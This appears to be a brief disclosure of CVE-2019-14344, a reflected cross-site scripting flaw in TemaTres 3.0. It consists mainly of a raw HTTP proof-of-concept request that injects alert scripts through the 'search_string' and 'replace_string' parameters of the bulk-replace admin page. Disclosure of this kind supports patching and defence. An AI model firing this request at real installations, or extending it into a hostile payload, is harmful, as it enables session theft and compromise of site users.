CVE-2019-14344 — TemaTres 3.0 — Cross-site scripting reflected (XSS)
TemaTres: controlled vocabulary server 3.0 — XSS
The parameters “replace_string” and “search_string” POST request (XSS reflected)
Proof Of Concept
POST /tematres3.0/vocab/admin.php?doAdmin=bulkReplace HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
Connection: close
Referer: http://localhost/tematres3.0/vocab/admin.php?doAdmin=bulkReplace
Cookie: PHPSESSID=9ver4jrlkaqi9rid65muvtok9a
Upgrade-Insecure-Requests: 1
ws=t&search_string=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&replace_string=%22%3E%3Cscript%3Ealert%28%22XSS1%22%29%3C%2Fscript%3E&boton=Vista+previa&taskAdmin=bulkReplace&replaceStep=bulkReplaceTest&doAdmin=bulkReplace